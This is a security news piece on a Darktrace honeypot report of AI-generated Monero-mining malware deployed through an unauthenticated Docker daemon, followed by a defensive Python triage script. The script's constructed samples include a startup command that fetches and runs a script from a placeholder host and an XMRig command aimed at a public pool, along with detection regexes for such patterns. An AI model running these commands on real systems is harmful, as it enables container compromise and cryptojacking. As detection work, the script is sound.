A new class of cyberattack, one whose code is AI-generated, has been caught in the wild: Darktrace has released a report detailing an intrusion into its CloudyPots honeypot network that revealed a fully AI-generated malware sample built to exploit the React2Shell vulnerability (CVE-2025-55182). The attack began with an internet-facing Docker daemon that had been left unauthenticated; the attacker spawned a container named “python-metrics-collector” to blend in with normal cloud activity.
Inside the container, the startup command installed curl, wget and python3, then downloaded and executed a Python script that Darktrace's analysis confirmed was fully AI-generated. According to Darktrace, the incident marks a shift in the threat landscape: AI-assisted software development (“vibecoding”) lets attackers rapidly produce functional tooling, allowing even low-skill operators to punch above their weight.
The malware was designed to mine Monero (XMR) using the XMRig miner (version 6.21.0), but it was configured to use a public mining pool, supportxmr[.]com, which made earnings statistics publicly visible and traceable. The rapid deployment of AI-written malware against a critical vulnerability like React2Shell signals that attack speed is accelerating, forcing defenders to contend with a flood of AI-generated variations produced as quickly as a prompt can be typed.
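The three observations above (an unauthenticated TCP-exposed Docker daemon, a container whose startup command installs curl/wget/python3 and then fetches and runs a script, and a miner pointed at a public pool) can be turned into simple triage checks. The Python below is an added example, not code from Darktrace's report: it runs regex rules over `docker inspect`-style container records and checks a `daemon.json` for a TCP listener without TLS client verification. All container records, hostnames, the port numbers and the wallet value are constructed for illustration, and the regex patterns are assumptions about how such a startup command would look.

```python
"""Triage checks for the intrusion pattern described above.

Added example (not Darktrace's code). Sample records are constructed.
"""
import json
import re

# Assumed patterns for the behaviour reported: a package manager pulling in
# curl/wget/python3, then a download that is piped or chained into an interpreter.
PKG_INSTALL = re.compile(
    r"\b(apt-get|apt|apk|yum|dnf|microdnf)\s+(install|add)\b[^;&|]*\b(curl|wget|python3?)\b")
FETCH_AND_RUN = re.compile(
    r"\b(curl|wget)\b[^;&|]*(\|\s*(sh|bash|python3?)\b|(&&|;)\s*(sh|bash|python3?)\s+\S+)")
# Strings that point at the miner or the public pool named in the report.
MINER_HINTS = re.compile(r"xmrig|supportxmr|stratum\+tcp://", re.IGNORECASE)


def command_text(config):
    """Flatten Entrypoint + Cmd from a `docker inspect` Config object into one string."""
    parts = (config.get("Entrypoint") or []) + (config.get("Cmd") or [])
    return " ".join(parts)


def triage_container(container):
    """Return the list of finding labels that fire for one inspect-style record."""
    findings = []
    text = command_text(container.get("Config", {}))
    if PKG_INSTALL.search(text):
        findings.append("installs-fetch-tooling")
    if FETCH_AND_RUN.search(text):
        findings.append("fetch-and-execute")
    if MINER_HINTS.search(text):
        findings.append("miner-indicator")
    return findings


def daemon_exposed_without_tls(daemon_json):
    """True when daemon.json binds a tcp:// listener but does not require TLS client certs."""
    cfg = json.loads(daemon_json)
    listens_tcp = any(h.startswith("tcp://") for h in cfg.get("hosts", []))
    return listens_tcp and not cfg.get("tlsverify", False)


# Constructed sample: mirrors the reported container name and startup behaviour.
# The download URL is a placeholder, not a real indicator from the report.
SAMPLE_CONTAINERS = [
    {
        "Name": "/python-metrics-collector",
        "Config": {
            "Image": "python:3.11-slim",
            "Cmd": ["sh", "-c",
                    "apt-get update && apt-get install -y curl wget python3 && "
                    "curl -s http://placeholder.invalid/collector.py -o /tmp/c.py && "
                    "python3 /tmp/c.py"],
        },
    },
    {   # constructed benign exporter for contrast
        "Name": "/metrics-exporter",
        "Config": {"Image": "prom/node-exporter:v1.7.0", "Cmd": ["--path.rootfs=/host"]},
    },
    {   # constructed: miner launched directly, pool string from the report (port/wallet made up)
        "Name": "/log-rotate",
        "Config": {"Image": "alpine:3.19",
                   "Cmd": ["xmrig", "-o", "stratum+tcp://supportxmr.com:3333",
                           "-u", "WALLET_PLACEHOLDER"]},
    },
]

# Constructed daemon.json fragments: the first matches the unauthenticated
# exposure in the report, the second is the TLS-verified equivalent.
EXPOSED_DAEMON_JSON = json.dumps({
    "hosts": ["tcp://0.0.0.0:2375", "unix:///var/run/docker.sock"]})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["tcp://0.0.0.0:2376", "unix:///var/run/docker.sock"],
    "tls": True, "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem"})


def triage_all(containers):
    """Map container name -> findings, keeping only containers with at least one hit."""
    return {c["Name"]: f for c in containers if (f := triage_container(c))}


if __name__ == "__main__":
    print("daemon exposed without TLS:", daemon_exposed_without_tls(EXPOSED_DAEMON_JSON))
    print("daemon hardened:", not daemon_exposed_without_tls(HARDENED_DAEMON_JSON))
    for name, findings in triage_all(SAMPLE_CONTAINERS).items():
        print(f"{name}: {', '.join(findings)}")
```

The package-install rule will also fire on legitimate images that install python3 at startup, so treat it as a weak signal and weight the fetch-and-execute and miner rules higher; the daemon check only reads configuration, so pair it with a listener inventory on the host to catch a daemon started with `-H tcp://...` on the command line rather than via `daemon.json`.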